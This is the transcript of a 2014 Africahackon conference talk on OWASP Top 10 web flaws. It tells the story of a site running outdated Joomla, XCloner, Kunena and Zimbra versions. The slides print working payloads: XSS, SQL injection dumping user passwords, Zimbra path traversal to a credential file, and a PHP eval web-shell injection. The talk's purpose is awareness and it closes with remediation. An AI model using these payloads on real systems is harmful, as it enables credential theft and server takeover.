This is a presentation given at the Africahackon 2014 conference in regard to web security with particular focus on OWASP top 10.

1. TThhee WWeebb yyoouu tthhoouugghhtt yyoouu
kknneeww
By Munir Njiru and Ruth Macharia

2. WWeebb SSeeccuurriittyy PPlleeaassee??
● Most people don't think its relevant , why?
– you either can't comprehend someone
attacking you.'
– you have no idea about attacks

3. OOWWAASSPP ttoopp 1100
● Glad I got your attention..
● There are guys that have tried to open
your eyes by creating awareness of this,
they are OWASP (Open Web Application
Security Project)
● They have ten categories for these attacks
but I will not bore you with all that talk so
get more info here:
https://www.owasp.org/index.php/Top_10_2013-Top_10

4. DDoonn’’tt bbee iilllluussiioonneedd!!!!
 The web can’t be covered in a day , Bear with
this it’s a tip of the iceberg but relevant. If we
could cover it You’d feel this:

5. SSoo wwhhaatt’’ss tthhee wwoorrsstt??
 Why should I care what could these breaches possibly
do you ask?
 Well you could lose your webutation
 You could lose cash
 You could have your secrets exposed
 And for admins you could involuntarily sign a power
sharing agreement, and we know you don't like that.
 This list is not comprehensive if you are holding your
breath keep holding it :)

6. You shall see the worst and jumbled stuff on
screen when an attack is carried out but don’t
panic when you see all the technical jargon on
screen just look at the results from the jargon
and the answer to what was happening shall
come.
DDiissccllaaiimmeerr

7. II mmaaddee aa MMiissttaakkee HHooww??
 Let us tell this as a story, you see how slowly
people fit in the OWASP Top 10, maybe not
everywhere but enough places to render you
done for:

8. II mmaaddee aa MMiissttaakkee HHooww??
 So the IT Manager had a proposition of giving a
dynamic site with the technology of today and a
robust mail server for communication. Here are
his specifications :
 Dynamic content management on a robust
platform (Joomla)
 Backup system based on XCloner
 Forum Based on Kunena to enable interaction
for staff and clients
 Zimbra Server for Mail Handling


9. II mmaaddee aa MMiissttaakkee HHooww??
 He missed however to check the security of the
proposed system and the version information
led to this sites demise.
 Let me save you the headache of his version
information- recon was spoken of well it got us
this:
- Joomla 1.5.15
- Xcloner 2.1
- Kunena 1.6.1
- Zimbra 8.0.2

10. XXSSSS
 Well this is the ability for an attacker to diss you
using your browser.
 It’s basically the ability to add code to what you
see , and this code is not usually added in your
best interest.

11. YYoouurr BBrroowwsseerr DDiisssseedd YYoouu!!
 Payload=> <script>alert("I said it was just an
XSS what's the worst that could happen? n
Then the hackers at Africahackon went straight
for my cookie jar and found all my secrets: nn"
);</script>

12. YYoouurr BBrroowwsseerr DDiisssseedd YYoouu!!
DDeemmoo

13. SSQQLL IInnjjeeccttiioonn
 First of all you don’t need to go through a
medicine class to get this.
 In layman what it is the ability to sweet talk your
database so that it can give it up !!!

14. II jjuusstt ssaaww mmyy NNaammee!!!!!!!!
 Payload => %' and 1=2) union select 1,
concat(0x3a,username,0x3a,email,0x3a,0x3a,a
ctivation),concat(0x3a,username,0x3a,email,0x
3a,password,0x3a,activation),'Super
Administrator','email','2009-11-26
22:09:28','2009-11-26
22:09:28',62,1,1,0,0,0,1,15 from jos_users-- ;

15. II jjuusstt ssaaww mmyy NNaammee!!!!!!!!
DDeemmoo

16. IInnffoorrmmaattiioonn DDiisscclloossuurree
 It's technically giving information to anyone ...
 Payload=> task=info

17. IInnffoorrmmaattiioonn DDiisscclloossuurree
DDeemmoo

18. LLFFII
 This is basically the ability to read files within the
system..
 If you are thinking big deal so what just chill you
will be answered.

19. WWaaiiiiiitttttt tthhee mmaaiill ttoooooo??????

20. WWaaiiiiiitttttt tthhee mmaaiill ttoooooo??????

21. WWaaiiiiiitttttt tthhee mmaaiill ttoooooo??????
 Payload=>
res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,Zm
Keys,ZdMsg,Ajx%20TemplateMsg.js.zgz?
v=091214175450&skin=../../../../../../../../../opt/zi
mbra/conf/localconfig.xml%00

22. WWaaiiiiiitttttt tthhee mmaaiill ttoooooo??????
DDeemmoo

23. SSeeee iitt iinn AAccttiioonn!!!!!!!!
To see this manually done without the
script check our video to get the gist of
the background:
http://www.youtube.com/watch?v=ahJLY
T8CLow

24. RRCCEE
 Just when you thought we were done :D well you
were warned , the web is wide but we will be
winding up in a bit.
 RCE - Its not "Regional Centers of Expertise", It's
Remote Code Execution

25. WWhhaatt JJuusstt HHaappppeenneedd??????
 Payload=> ?task=step2&output_url_pref=';+}+?
>+<?php+eval($_GET['africahackon']);+?
>&output_path=../../../../

26. WWhhaatt JJuusstt HHaappppeenneedd??????
DDeemmoo

27. RReemmeeddiiaattiioonn
● This would all have been avoided if:
– Data was validated on the platform
– The technology was investigated before
being implemented.

28. QQuueessttiioonnss
● Don't be ashamed to scratch your head
after this; I would too its a lot of
information.

29. CCoonnttaacctt UUss

30. THANK YOU